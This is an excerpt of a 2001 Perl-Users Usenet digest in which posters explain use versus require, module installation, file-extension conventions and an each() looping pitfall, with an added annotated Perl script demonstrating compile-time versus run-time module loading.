>>
>>> What I'm starting to glean out of this is that Perl Modules need to be
>>> Installed onto a server or into Perl itself.  Is that right?
>>
>>well, any code that you intend to pull into your scripts need
>>to be available for perl to read.  that commonly means that
>>the code needs to be installed with perl.


>But I thought that that was what the use command was for in a
>script...to add-in features/modules when they are needed.  Since Perl
>is interpretive, I assumed 
                  ^^^^^^^^^

Warning Will Robinson!

Why not look it up and _know_?

It is a bit down in

   perldoc perlrun

but it gets to it eventually:

----------------------------
After locating your program, Perl compiles the entire program to an
internal form.  If there are any compilation errors, execution of the
program is not attempted.  (This is unlike the typical shell script,
which might run part-way through before finding a syntax error.)

If the program is syntactically correct, it is executed.
----------------------------


Perl is a compile-and-go language. It has a "compile" phase
and a "run" (interpretive kinda) phase.


>that this happens on the fly, 

I assume "on the fly" means "at run time".

"require" is run time.

"use" is compile time.

But either way, perl will need to know _where_ to get the
code to be included, whether at compile or run time.


>so why
>"Install" or "Make" the files?


Because there _is_ a compiler there, even if you don't see it.


-- 
    Tad McClellan                          SGML consulting
    tadmc@augustmail.com                   Perl programming
    Fort Worth, Texas
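An added example (mine, not Tad McClellan's or Damian James's) for the two module-loading points in this digest: Tad's explanation that `use` runs in the compile phase and `require` in the run phase, and the perlfaq8 answer Damian points at for putting the directory the program lives in onto the search path. FindBin and lib are core modules; `MiscDemo`, `No::Such::Module` and the sub names are constructed for the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use FindBin qw($Bin);      # $Bin: the directory this program lives in
use lib "$Bin/lib";        # compile time: that directory is on @INC from here on
use File::Temp qw(tempdir);
use File::Spec;

our @TRACE;                                        # order in which the phases ran
BEGIN { push @TRACE, 'compile phase: BEGIN/use' }  # runs while the file is being compiled
push @TRACE, 'run phase: first statement';         # runs only after the whole file compiled

# Did 'use lib' put the program's own lib/ directory on the search path?
sub script_lib_on_inc {
    my $want = "$Bin/lib";
    return scalar grep { $_ eq $want } @INC;
}

# Write a tiny module into $dir at RUN time (constructed for the demo).
sub write_module {
    my ($dir) = @_;
    my $path = File::Spec->catfile($dir, 'MiscDemo.pm');
    open my $fh, '>', $path or die "cannot write $path: $!";
    print $fh "package MiscDemo;\nsub greet { 'hello from ' . __PACKAGE__ }\n1;\n";
    close $fh or die "cannot close $path: $!";
    return $path;
}

# 'require' happens when this statement executes, so a directory added to
# @INC a moment earlier is honoured. 'use MiscDemo' here would have failed:
# it runs at compile time, before write_module() created the file.
sub load_at_runtime {
    my ($dir) = @_;
    push @INC, $dir;
    require MiscDemo;
    return MiscDemo::greet();
}

# A missing module is a compile-time abort with 'use', but with 'require'
# inside eval it is an ordinary run-time error the program can handle.
sub try_missing {
    return eval { require No::Such::Module; 1 } ? 'loaded' : 'not found';
}

my $dir = tempdir(CLEANUP => 1);
write_module($dir);
push @TRACE, 'run phase: ' . load_at_runtime($dir);
print "$_\n" for @TRACE;
print 'lib on @INC: ', (script_lib_on_inc() ? 'yes' : 'no'), "\n";
print 'No::Such::Module: ', try_missing(), "\n";
```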


------------------------------

Date: 30 Aug 2001 21:05:19 -0700
From: trewth_seeker@yahoo.com (Trewth Seeker)
Subject: Re: Difference between .pl, .cgi, and .pm File Extensions.
Message-Id: <d690a633.0108302005.b8f5f4a@posting.google.com>

Bob Holden <bob@eawf.nospam.com> wrote in message news:<h1usotogbc2s5vrftjvmf2r6s1cqe53k94@4ax.com>...
> On 30 Aug 2001 09:51:09 GMT, anno4000@lublin.zrz.tu-berlin.de (Anno
> Siegel) wrote:
> 
> >According to Alan J. Flavell <flavell@mail.cern.ch>:
> >> On Aug 29, brian d foy inscribed on the eternal scroll:
> >> 
> >> (re. use of .pl as a filename 'extension'):
> >> 
> >> >     perl *library*.  some people frown on using this (or any)
> >> >     extension for scripts.  sometimes you'll see .plx (perl
> >> >     executable) since some operating systems just can't do
> >> >     without.
> >> 
> >> Well, since the canonical building procedure starts with
> >> 
> >>    perl Makefile.PL
> >> 
> >> it would seem that someone "in authority" thinks that Perl scripts
> >> have a filename extension of .PL (upper case).
> >
> >I believe this assumes more deliberation than actually went into the
> >naming of that file.  Before MakeMaker, module authors packed their
> >own Makefile with a product.  This led to subtle and not-so-subtle
> >differences in the make process for each module.
> >
> >As a remedy, Andreas Koenig wrote MakeMaker.  To make it clear that
> >you (the module author) were now supposed to replace your former
> >Makefile with an equivalent template for MakeMaker, and as an indication
> >to you (the module installer) that you were supposed to run it as a
> >Perl program, the standard name for the template became Makefile.PL,
> >using the established .pl suffix for a Perl program.  Why upper-case,
> >I do not know.
> What I'm starting to glean out of this is that Perl Modules need to be
> Installed onto a server or into Perl itself.  Is that right?

No, not really.  I strongly suggest that you purchase and read
the O'Reilly books, _Programming Perl_ and _Perl Cookbook_, and
only ask questions here once you've done so -- you will spend
far less time with that approach.

> >
> >I am Cc'ing this to Andreas (Hi!) so he can comment if he feels like it.
> >
> >Anno


------------------------------

Date: Thu, 30 Aug 2001 12:58:14 +0000 (UTC)
From: bernard.el-hagin@lido-tech.net (Bernard El-Hagin)
Subject: Re: each() bug (?)
Message-Id: <slrn9osdnt.2n3.bernard.el-hagin@gdndev25.lido-tech>

On 30 Aug 2001 16:05:57 +0400, Ilya Martynov <ilya@martynov.org> wrote:
>
>Any ideas why following code (under Perl 5.6.1) causes infinite loop?
>
>    while(my($value, $uiname) = each %{{ true => 'Yes', false => 'No' }}) {
>        print "$uiname\n";
>    }
>
>While this code works as expected
>
>    my $href = { true => 'Yes', false => 'No' };
>    while(my($value, $uiname) = each %{$href}) {
>        print "$uiname\n";
>    }

In the first snippet you're creating a new hashref each time through
the loop.

Cheers,
Bernard
--
perl -l54e's yyw q q tvmrx "h\ywx ersxliv zivp legoiv"qiy;y #a-zA-Z#d-gu-z#
chefghijklmnopqrstuvwxyzcJab-def-uPwxyzc;s j j s u u s t t s r r s
ppevalpereeteueje'


------------------------------

Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin) 
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>


Administrivia:

The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc.  For subscription or unsubscription requests, send
the single line:

	subscribe perl-users
or:
	unsubscribe perl-users

to almanac@ruby.oce.orst.edu.  

To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.

To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.

For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.


------------------------------
End of Perl-Users Digest V10 Issue 1664
***************************************

